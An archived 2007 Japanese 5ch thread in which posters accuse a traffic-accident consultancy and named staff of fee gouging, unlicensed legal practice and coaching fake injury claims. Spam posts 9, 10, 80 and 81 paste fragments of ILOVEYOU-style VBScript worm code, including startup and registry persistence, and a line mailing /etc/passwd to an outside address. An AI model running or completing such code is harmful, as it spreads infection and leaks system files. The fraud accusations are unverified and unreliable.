5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

暴利を貪る交通事故110番・似非NPOの実態 Part19

1 :もしもの為の名無しさん:2007/01/03(水) 15:14:01
ここでの徹底した批判に懲りたのか、一転して、これまで隠れ蓑にしていたNPOの看板をひた隠しにしながら、
一皮剥けば(特定商取引について http://www.jiko110.com/transaction/index.htm や、販売しているパクり本を見ると)堂々とNPOを掲げている姑息な悪徳暴利集団。

交通事故被害者の不安、弱味や無知につけ込む狡猾で巧妙な詐欺的手法はCGI会員制度という被害者有料囲い込み策に端的に表れている。
自賠責後遺障害認定金の20%を手数料と称して徴収し、非弁行為もなんのその、
合法的実利獲得と嘯きながら詐病教唆までするこのグループによるさらなる二次、三次的被害を防ぐため、この暴利を貪る悪徳商法集団を引き続きウォチしていきましょう。

テンプレ等の保持者の方には協力願います。


2 :もしもの為の名無しさん:2007/01/03(水) 15:15:20
時間によって、読むことができたり、できなかったりするけど・・・??

【損保の敵】交通事故110番【新手の示談屋】
http://makimo.to/2ch/society_hoken/1060/1060074593.html
NPOを隠れ蓑に営利を貪る交通事故110番
http://makimo.to/2ch/society3_hoken/1081/1081224003.html
NPOを隠れ蓑に営利を貪る交通事故110番Part2
http://makimo.to/2ch/society3_hoken/1092/1092461613.html
NPOを隠れ蓑に営利を貪る交通事故110番Part3
http://makimo.to/2ch/society3_hoken/1101/1101569132.html
NPOを隠れ蓑に営利を貪る交通事故110番Part4
http://makimo.to/2ch/society3_hoken/1105/1105962244.html
NPOを隠れ蓑に営利を貪る交通事故110番Part5
http://makimo.to/2ch/society3_hoken/1111/1111298441.html
NPOを隠れ蓑に営利を貪る交通事故110番Part6
http://makimo.to/2ch/society3_hoken/1114/1114871456.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part7
http://makimo.to/2ch/society3_hoken/1116/1116232776.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part8
http://makimo.to/2ch/society3_hoken/1118/1118396838.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part9
http://makimo.to/2ch/society3_hoken/1122/1122358494.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part10
http://makimo.to/2ch/society3_hoken/1124/1124641370.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part11
http://makimo.to/2ch/society3_hoken/1128/1128010532.html
NPOを隠れ蓑に暴利を貪る交通事故110番Part12
http://makimo.to/2ch/society3_hoken/1130/1130860504.html

3 :もしもの為の名無しさん:2007/01/03(水) 15:16:06
交通事故被害者を食い物にする事故110番
 http://society.2ch.net/test/read.cgi/hoken/1066554172/
交通事故被害者を食い物にする事故110番その2
 http://society.2ch.net/test/read.cgi/hoken/1070105653/

NPOを隠れ蓑に暴利を貪る交通事故110番Part13
 http://society3.2ch.net/test/read.cgi/hoken/1139129871/
NPOをひた隠し暴利を貪る交通事故110番 Part14
 http://society3.2ch.net/test/read.cgi/hoken/1146867949/
NPOをひた隠し、暴利を貪る交通事故110番 PART15
http://society3.2ch.net/test/read.cgi/hoken/1150013692/
NPOをひた隠し、暴利を貪る交通事故110番 PART16
http://society3.2ch.net/test/read.cgi/hoken/1151233797/
交通事故110番・似非NPOの実態 PART17
http://society3.2ch.net/test/read.cgi/hoken/1152085894/
暴利を貪る交通事故110番・似非NPOの実態 Part18
http://society4.2ch.net/test/read.cgi/hoken/1156512379/

4 :もしもの為の名無しさん:2007/01/03(水) 18:25:46
まずはスレ立てサンクス

5 :もしもの為の名無しさん:2007/01/03(水) 22:48:28
983 :もしもの為の名無しさん :2006/12/31(日) 04:23:24
事故110番HPに載ってました

>>【2004/10/22】360「スペクト検査とSSEP?」

>>一方、SSEP検査は、最近になって注目を浴びている電気生理学的検査です。
>>体性誘発電位検査とも呼ばれ、損保協会の医研センターは、今年の4月に、
>>これらの電機子理学的検査の研修を行っています。 Nliro調査事務所も
>>注目している検査であることに違いはありません。 

>>名古屋にこの検査を熱心に展開される脳神経内科があり、
>>名古屋jiko110.comの大下が被害者に同行し、実績を積み上げています。


「名古屋jiko110.comの大下??」
熱心にお金儲けされていた仲間がいたのですね(^^)頑張ってください!

6 :もしもの為の名無しさん:2007/01/03(水) 22:49:35
985 :もしもの為の名無しさん :2006/12/31(日) 15:54:08
しかし、O下もM尾も電機子理学的検査だなんだとよくもまあ
色々と次から次と詐欺師の材料を捜しあてるもんだ。
そこまでしてでも続けることは相当の大儲けになっているんだなー
奴らの頭の中は「後遺障害請求詐欺」しかないのか?
等級や実利を勝ち取るとか言う前に「後遺障害に苦しむ人の為の治療法」
等を研究するのが事故被害者の為のNPOの役目ではないのか!!
本当の被害者は等級や実利では無く、等級認定以外に「少しでも元の
身体に戻りたい」と切に願っているのだ。
それを「金・金」とはやし立てて手数料をせしめる。
膨大に得た手数料で後遺症患者の治療法の研究に投資でもしていれば
まだしも、自らの贅沢三昧の為であれば正に110は「詐欺師」だ!!


986 :もしもの為の名無しさん :2006/12/31(日) 16:07:55
弁護士も
ttp://homepage3.nifty.com/kotsu-net/
のような人達が出てきたようだし、110のポジティブな意味での
使命もおわったんじゃないかな。

O下やM田のような二番煎じもいらんだろ


7 :もしもの為の名無しさん:2007/01/03(水) 22:53:26
         /⌒`⌒`⌒` \     
         /           ヽ、   
   ビシッ (  ノ⌒〜⌒〜⌒ヽ、 ) やぁ 消費者諸君!   
    / ̄\ヽ/    \, ,/   i ノ ワテが鯖の誹便行虫 浪花の法律屋や!  
  , ┤    ト||    <・>, <・>  |ワテが2度と悪事を出来ないよう
 |  \_/  ヽ、   ,,,,(、_,),,,   ノ| 保険会社を監視してやろうと考えてます。
 |   __( ̄ |  ト=ニ=ァ   /  大阪人のど根性みせたるで!諸君! 
 |    __)_ノ \  `ニニ´  /
 ヽ___) ノ    ` ┻━┻ 
    ┌' ̄' ┬─‐┐┐鯖の行書 浪花の法律屋の
    l=  =| ロ |
   │ = │   :| ̄ ̄ ̄[]] ̄|| ̄[]]_ ____| ̄|
    l=  =| ロ | ̄フ  / l   ||  | |_|_| |_|
    └t___r┤_冂__!/__∧_.∨___,八____\ ∠_/l二l


8 :もしもの為の名無しさん:2007/01/03(水) 22:58:48


9 :もしもの為の名無しさん:2007/01/03(水) 22:59:14
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com

10 :もしもの為の名無しさん:2007/01/03(水) 22:59:31
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

11 :もしもの為の名無しさん:2007/01/03(水) 23:00:24
                            /⌒`⌒`⌒` \
                           /           ヽ
                            (  ノ⌒〜⌒〜⌒ヽ、 )∧__T _ ,,,r -r-T‐-、
             \             ヽ/     \, ,/  i ノ :: 。r *o:*::f:::r:::..l
               \    __,-,,-、  ___ |::::::  <・>, <・>  |"::::::::*o;;;ro ot_f_ヽ丿
                 \.__/| | l |ヾ-"~ (6|:: 、  ,,,,(、_,),,,  ノ|i,,..-v--'''''''"V"~~┴
               l⌒ 二 -l ..uUU""l---- ヽ   ト=ニ=ァ   /
              └    l  (  / __ \   `ニニ´ /      ウダウダ考えてもムダや
      .ト  /::::ヽ       |   //   |  ` ┻━┻' ヽ、_     すべてワテに依頼するば
   ヽ、i / .∠::::::::::::\    /    | /    ヽ_       _/    ヽ、 誹便で解決やで!消費者諸君
    / y'_/::::::::::::::::::::::ヽ   /     |/       "〜-""~~~      ヽ、
 .ゝ-+-::| ||(((::::::::::::::::::::i   /     |-                     ヽ、
  .__/::|  ̄∪\:::::::::::::::l /      |  ヽ                   ヽ 
   / /:|   ゚̄` |::::::::::::::/       |  |   誹 便 行 虫             │
    i ::| 、`` u .|:::::::::::│       |  l                     │
    /i ::|-    丿::::::::::::|       /   |                        |





12 :もしもの為の名無しさん:2007/01/04(木) 09:07:14
さっそくウィルステンプレか。110信者どもご苦労なこった。

13 :もしもの為の名無しさん:2007/01/04(木) 18:01:10
>>5
要は詐病のレクチャーなんだよね。
後遺障害診断に使える検査方法ってやつ。

14 :もしもの為の名無しさん:2007/01/05(金) 12:53:10
デタラメ、嘘つき、口任せの交通事故110

15 :もしもの為の名無しさん:2007/01/06(土) 14:24:28
デタラメ、嘘つき、口任せの不払い損保

16 :もしもの為の名無しさん:2007/01/07(日) 01:06:52
トルーパー あの人は今どこに!!

17 :もしもの為の名無しさん:2007/01/07(日) 11:52:28
老婆心ながら あの人も今どこに!!

18 :もしもの為の名無しさん:2007/01/07(日) 20:32:07
明けても暮れても被害者を騙してカモにする交通事故110

19 :もしもの為の名無しさん:2007/01/07(日) 20:38:05
明けても暮れても契約者を騙してカモにする不払い損保

20 :もしもの為の名無しさん:2007/01/07(日) 21:19:18
開けても暮れても進歩が無い、このスレたてるやつ!

21 :もしもの為の名無しさん:2007/01/08(月) 09:43:04


小学生以下の漢字力
誤字脱字、常識欠如のミヤオそっくり

程度が低い110信奉者

22 :もしもの為の名無しさん:2007/01/08(月) 22:43:04
程度が低いだけじゃなく、欲の深さも相当な110信者。

23 :もしもの為の名無しさん:2007/01/09(火) 16:26:11
自らの後遺障害をタテにとにかくカネが欲しいという被害者も同類。

24 :もしもの為の名無しさん:2007/01/09(火) 21:05:27


25 :母でございます。:2007/01/09(火) 21:07:46
どうも、皆様こんばんわ。私はこのスレたてた者の母親でございます。いつも息子がご迷惑かけてばかりで。。
息子も昔はこんなじゃなかったんですよ。。 それが突然5年前、コンビニの駐車場で時速5キロの車に追突されまして、
ますます引きこもりになったんですよ。事故前はアルミ缶回収の仕事を始めましてね。「ママ!僕はフリーで仕事してるから社長だね!」って元気がよかったんですが、
事故後、どこも怪我してないのに、「ママ!年末はハワイだよ!」とか、わけのわからない事言い出したりして。。
なんか110番?て言うんですか?毎日サイトを見るようになりましてね。「僕7級とれるみたいだ!」とか言ったりして。。何回異議申し立てしても、どこも悪くないから当然。非該当で。。
突然、110番を逆恨みしはじめたんです。 どうか皆様うちの息子は訴える事もできずに、こうしてスレ立てるしか出来ない子ですから、大目にみてやってくださいね。


26 :もしもの為の名無しさん:2007/01/09(火) 21:08:15
宅建と行政書士について街頭インタビュー

会社員(25)「会社で資格手当ても出るし欲しいのは宅建ですね」
会社役員(55)「そりゃー宅建だよ。行書なんか必要ない!」
自由業(40)「書類とか自分で書けるし、わざわざ金払ってまで
         頼むことないでしょ?今、アパート経営に向けて宅建勉強してます」
社労士(29)「行書って、なんか、やたら我々に絡んでくるんですよね。迷惑です」
OL(22)「なんか宅建持ってる人って知的に見える。行政書士はイメージが暗い」
大学生(19)「とりあえず社会に出るまえに宅建は取りたいです。行書?いまさら高校
        レベルの試験なんていらないッス」
キャバクラ嬢(21)「不動産関係のオジサンはお金持ってるから好き!たまに行政書士とか
           ゆう人が来るんだけど貧乏くさい。安い酒しか飲まないしキモイ」
税理士(34)「宅建は我々の実務でも役に立ちますね。
          え、行政書士?あんなもの試験受けてまで取る資格じゃないね」
無職・ニート(30)「行政書士って俺よりも最底辺の人種だろ。」
ペットショップ店員(25)「行政書士よりここにいるイヌ・ネコのほうが利口ですよw」
女子高生(17)「ぎょうしょって何だかギョーチューみたいでキンモー☆」


27 :もしもの為の名無しさん:2007/01/10(水) 22:57:12
詐病を教唆して後遺障害等級を取らせ、その上前をハネる交通事故110

28 :もしもの為の名無しさん:2007/01/12(金) 08:39:52
>>27
禿同

29 :もしもの為の名無しさん:2007/01/12(金) 10:40:56
ミヤオが言ってることって全部被害者からの受け売り
相談にのるって言いながら
その内容や経過、結果、被害者が委任した弁護士の対応などを蓄積して
さも自分の知識、経験のようにまことしやかに蘊蓄垂れてるだけ
実は頭の中はからっぽなので行政書士の試験さえ受からないシロモノ
示談屋だから事故関係の経験則は身体に染み込んでいるから能書きは立派だけど
一般常識の無さは覆い隠せない
ミヤオが能書き垂れてる世間話がいい見本
無教養を晒してるね

30 :母でございます。:2007/01/12(金) 22:29:21
掲示板もここも、閑古鳥泣いてるね。。

31 :もしもの為の名無しさん:2007/01/12(金) 22:34:28
(・∀・)イイ!

32 :もしもの為の名無しさん:2007/01/12(金) 23:48:21
掲示板はなぜ急に辞めたのかね?

33 :もしもの為の名無しさん:2007/01/14(日) 01:38:07
110の掲示板なんて最後の書き込みが11月のだった。ヘタリ始めてるよ。

34 :もしもの為の名無しさん:2007/01/14(日) 02:03:36
>>25 何処でも同じ事書いてるね。
荒しだね。

35 :もしもの為の名無しさん:2007/01/15(月) 23:09:30
>>4
http://society3.2ch.net/test/read.cgi/hoken/1159547385/l50


36 :もしもの為の名無しさん:2007/01/15(月) 23:10:57
110番に相談メール送る前にここ見てよかった。

37 :もしもの為の名無しさん:2007/01/16(火) 08:07:55
>>36
ついでに過去スレも見てね。

38 :もしもの為の名無しさん:2007/01/16(火) 08:10:31
110番にメールしてしまった!
しかもM尾から返信がきてる。
メルアド変更するしかないですよね?

39 :もしもの為の名無しさん:2007/01/16(火) 08:15:54
無視しておけばok

40 :裁判になりました:2007/01/16(火) 15:33:53
110に有料相談しましたが、何の解決にもならず関わった事で余計にコジれ、裁判になりました

41 :もしもの為の名無しさん:2007/01/16(火) 15:35:23
         /⌒`⌒`⌒` \     
         /           ヽ、   
   ビシッ (  ノ⌒〜⌒〜⌒ヽ、 ) やぁ 消費者諸君!ワテは鯖の誹便業務の他に   
    / ̄\ヽ/    \, ,/   i ノ 全国裁判所の傍聴席に着席するのが業務  
  , ┤    ト||    <・>, <・>  | 全国消センに嫌がらせ業務妨害する業務なども
 |  \_/  ヽ、   ,,,,(、_,),,,   ノ|引き受けしてるのや!諸君
 |   __( ̄ |  ト=ニ=ァ   /   
 |    __)_ノ \  `ニニ´  /
 ヽ___) ノ    ` ┻━┻ 
裁判官:相手にされず 弁護士:相手にされず 消セン:相手にされず


42 :もしもの為の名無しさん:2007/01/17(水) 00:07:41
ガサ入れ入るから掲示板動いてないのだろうか?

43 :もしもの為の名無しさん:2007/01/17(水) 14:51:14

NPOを隠れ蓑にする新手の示談屋?

交通事故被害者に事故解決を手伝うNPOとの触れ込みで
近づきながら、高額の「寄付金」を請求されているとの苦情が
関西の国民生活センターに寄せられている。

http://dailynews.i8.com/sports/baseball/20070117-00000112-nks.html

44 :もしもの為の名無しさん:2007/01/17(水) 18:33:03
>>43
それって 以前に 老婆心ながら とかいう 口先野郎が 告げ口したとこ

45 :もしもの為の名無しさん:2007/01/17(水) 20:13:45
>>40
釣りネタでなければ、詳細キボン

46 :もしもの為の名無しさん:2007/01/17(水) 23:05:18
老婆心あきらめたのかい?

47 :もしもの為の名無しさん:2007/01/18(木) 18:09:50
110は事故被害者をカモにする被害者救済を気取った似非集団。

48 :もしもの為の名無しさん:2007/01/18(木) 18:22:11
>喧嘩好きの被害者の皆様! 今年も共に戦って実利をガッポリ毟り取りましょう!
>本年も、保険屋さんと Nliro 調査事務所が眉をひそめる NPO を目指します。

M尾の新年の挨拶コメント。
喧嘩して『毟り取る』NPOを目指すんだと(いつの間にかNPO復活w)

正当な賠償を得ようというNPOではないみたいだね。

49 :もしもの為の名無しさん:2007/01/19(金) 14:52:38
正当な賠償を得る?と謳いながら、その実は難くせつけてガッポリ毟り取ろうってやつだろ。

50 :もしもの為の名無しさん:2007/01/19(金) 19:05:13
>>47
禿同

51 :もしもの為の名無しさん:2007/01/19(金) 23:01:38
むちうちキャンペーンまだやってる?

52 :もしもの為の名無しさん:2007/01/20(土) 11:35:24
正当な賠償と言いながら詐病をレクチャーする似非NPO

53 :もしもの為の名無しさん:2007/01/20(土) 14:42:53
Yahooの知恵袋で交通違反点数がどうとか語ってる。ライセンス保険でも始めたか?

54 :もしもの為の名無しさん:2007/01/21(日) 13:28:34
とにかく、何かカネになるやり方がないかって探しているんだよ、まるで交通事故乞食。

55 :もしもの為の名無しさん:2007/01/21(日) 15:25:46
厳しい批判を掲示板でされ、懲りて苦し紛れに掲示板を閉鎖。
事前登録制とかいう苦心の方策が個人情報を握る目的と見破られ困ってしまったミヤオさん。
苦し紛れに、ミクシィに登録して書き込みを始めるが営利目的、売名行為と告発され、出入り禁止処分の憂き目に遭い、
今では、その場をヤフーの知恵袋に移し、ベストアンサーとかを自画自賛、自慢してHPにも晒している。
批判をされるとNPO返上とか引退を宣言し、その場しのぎで批判をかわして掲示板事前登録制で封じ込めたつもりが、今度は相談者が激減するオマケつきで困ってしまったミヤオさん。
損保110とかを立ち上げて必死に生き残りを模索中です。
またまた口から出任せの大風呂敷です。
まさに喜劇の110です。

56 :もしもの為の名無しさん:2007/01/21(日) 15:39:35
>>55
ミクシィ締め出されたの?
詳しくお願い。

57 :もしもの為の名無しさん:2007/01/21(日) 16:49:46
ヤフー知恵袋
トップ > 暮らしと生活ガイド > 法律、消費者問題 > 消費者問題

質問日時: 2007/1/17 01:31:25 残り時間: 3日間 質問番号: 10,523,623
交通事故110番の20%報酬について

NPO法人じこいちいちまるドットコム(交通事故110番)の医療コーディネートを依頼しようか考えています。

2ちゃんねるでは無資格者と言われているのを拝見し、自賠責保険認定額の20%を支払った場合、依頼した私も弁護士法72条の非弁行為って言うのに該当し、罪に問われるのでしょうか。




58 :40ダス:2007/01/21(日) 21:47:37
釣りではなく、マジです。決着ついたら公表します。暫くお待ちを

59 :もしもの為の名無しさん:2007/01/22(月) 00:04:03
>>55
素晴らしい。
110の実態、その正体を完璧に把握している。

60 :もしもの為の名無しさん:2007/01/22(月) 01:06:43
※NPO法人交通事故110番に相談されている利用者様は、『医師による交通事故相談〜ドクタ交通事故医療相談所〜紹介サイト』他、私たちの運営する事業のご利用を、ご遠慮頂きます。
http://docta.jp/compliance/index.html

61 :もしもの為の名無しさん:2007/01/22(月) 14:06:28
110に騙されて裁判に訴えた人って、もしかしてそこそこいるんじゃないの?

62 :もしもの為の名無しさん:2007/01/22(月) 20:41:31
>>55
>損保110とかを立ち上げて必死に生き残りを模索中です。

引退するとか何とか言ってたんじゃないの? いい加減さでは右に出る者のない交通事故110

63 :もしもの為の名無しさん:2007/01/22(月) 22:44:09
>>56
ミクシィに最近は登場できない
って言うか登録抹消されてる
告発されてバイバイされた

64 :もしものための名無しさん:2007/01/22(月) 23:19:17
>>60

これは110番のスタッフだった○田のサイトじゃないの?
そりゃ断るわ。

65 :もしものための名無しさん:2007/01/22(月) 23:26:05
>>57
回答してるヤツがいるぞ。

66 :もしもの為の名無しさん:2007/01/23(火) 00:04:05
>>60 そのサイトのやってる事に違法性は無いのかい?

67 :もしもの為の名無しさん:2007/01/23(火) 01:05:36
損保110番はT海上保険と組んだのか? 加害者の保険がTだったら何をする気なのだ!?

68 :もしもの為の名無しさん:2007/01/23(火) 12:24:19
>>64
110に名義貸ししていた行政書士の○田か?
まだ110とつるんでいるのか、腐れ縁だな。

69 :もしもの為の名無しさん:2007/01/23(火) 12:42:28
>>67
T海上保険が110と組むとは思えないが・・・

70 :もしもの為の名無しさん:2007/01/23(火) 17:44:42
>>67.69
T海上と組んだのではなく、T海上の代理店と組んだだけ。
実際に事故が起こったときにT海上がどのような対応をするかが見もの。
だって、人身傷害は(約款ではなく)地方裁判所基準で請求できるとはっきり書いてるんだからね。

>交通事故110番を読んでおられる方はご存知の通り、人身傷害保険金を請求する際には、地方裁判所支払基準ですることが可能です。

71 :もしもの為の名無しさん:2007/01/23(火) 17:51:29
>>66.68
○田は「元」行政書士だよ。
具体的にどんな活動をしてるのかまだわからないけど、110で美味しい目をしてきた人間が立ち上げたサイトだからそれなりに注意して見る必要はあるだろうね。

72 :もしもの為の名無しさん:2007/01/23(火) 20:30:21
>>71
元行政書士って、今は辞めたってこと?
資格取り消しになったのかな。なんせ名義貸しは違法だからね。

73 :もしもの為の名無しさん:2007/01/23(火) 21:11:08
>>70
裁判所基準なんかで請求できるわけないじゃないの、馬鹿丸出し。


74 :もしもの為の名無しさん:2007/01/23(火) 23:03:34
>>72
2年ほど前に京都府行政書士会を退会している。
事情は推測してくれ。

75 :もしもの為の名無しさん:2007/01/23(火) 23:21:22
>>71
http://society3.2ch.net/test/read.cgi/hoken/1159547385/l50



76 :もしもの為の名無しさん:2007/01/24(水) 00:29:25
>>70
支払われるとは何処にも書いてない。
請求する事自体は、どの支払い基準でも関係ないでしょ。
そこが事故110番たる所以なんだよ。よ〜く読まなきゃ。

77 :助けて:2007/01/24(水) 06:46:20
私は会社の社長の命令で(無免許で)
車を運転してフェンスにぶつけて500万払わされるはめになりました。

車は軽のワゴンです。
事故現場は私有地の砂利道。
フェンスは駐車場に立ってるやつ(緑)

給料は1ヶ月働いても携帯代と部屋代引かれて2万です。

後、彼女をデリヘルで働かされてます。

どうすれば良いのか解かりません。

みなさん、力を貸してください。

78 :もしもの為の名無しさん:2007/01/24(水) 09:18:10
↑警察へ行きましょう

79 :もしもの為の名無しさん:2007/01/24(水) 14:01:28
>>76
そりゃ、エグすぎるわ。悪徳そのもの。ペテン詐欺師なみだね。

80 :もしもの為の名無しさん:2007/01/24(水) 14:24:31
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))

81 :もしもの為の名無しさん:2007/01/24(水) 14:25:30
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com

82 :もしもの為の名無しさん:2007/01/24(水) 17:01:53
>>70
代理店と組んでまた別の金儲けのタネを仕込むつもりんだな。相変わらず汚いやり口。

83 :もしもの為の名無しさん:2007/01/25(木) 12:58:14
都合が悪いレスが続くと馬鹿丸出しのテンプレが出てくるね。

84 :もしもの為の名無しさん:2007/01/26(金) 14:16:32
>>76
同感。

85 :もしもの為の名無しさん:2007/01/26(金) 21:00:57
http://search.chiebukuro.yahoo.co.jp/search/search.php?flg=3&p=%E4%BA%A4%E9%80%9A%E4%BA%8B%E6%95%85%EF%BC%91%EF%BC%91%EF%BC%90%E7%95%AA+20%25+%EF%BC%AE%EF%BC%B0%EF%BC%AF

86 :もしもの為の名無しさん:2007/01/28(日) 01:24:01
新たなヤフー智恵袋
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?qid=1110626646

皆様の意見、お待ちしております。

87 :もしもの為の名無しさん:2007/01/28(日) 12:17:45
デタラメ、嘘つき、口任せの交通事故110

88 :もしもの為の名無しさん:2007/01/29(月) 08:49:30
保険屋も同じ。ただのマッチポンプ
困るは被害者ばかりなり。

89 :もしもの為の名無しさん:2007/02/05(月) 19:34:09
ミクシィで頑張っていますよ。

90 :もしもの為の名無しさん:2007/02/06(火) 12:30:28
検挙も間もなく

91 :もしもの為の名無しさん:2007/02/13(火) 03:55:57
age

92 :もしもの為の名無しさん:2007/02/13(火) 03:57:39
age

93 :もしもの為の名無しさん:2007/02/17(土) 00:21:27
仲間の教育って誰があの狂ったおっさんについていくのじゃ?
あんなおっさんに手数料払う必要ないで。契約書書いていないからブッチするべし

94 :もしもの為の名無しさん:2007/02/19(月) 01:19:02
もう少しじゃなくて
しっかり行政や弁護士などが親身になって対応してくれないから
こんなやつらがむさぼるんだ!!
国をあげてなんとか被害者救済をしてくれ!!!

28 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)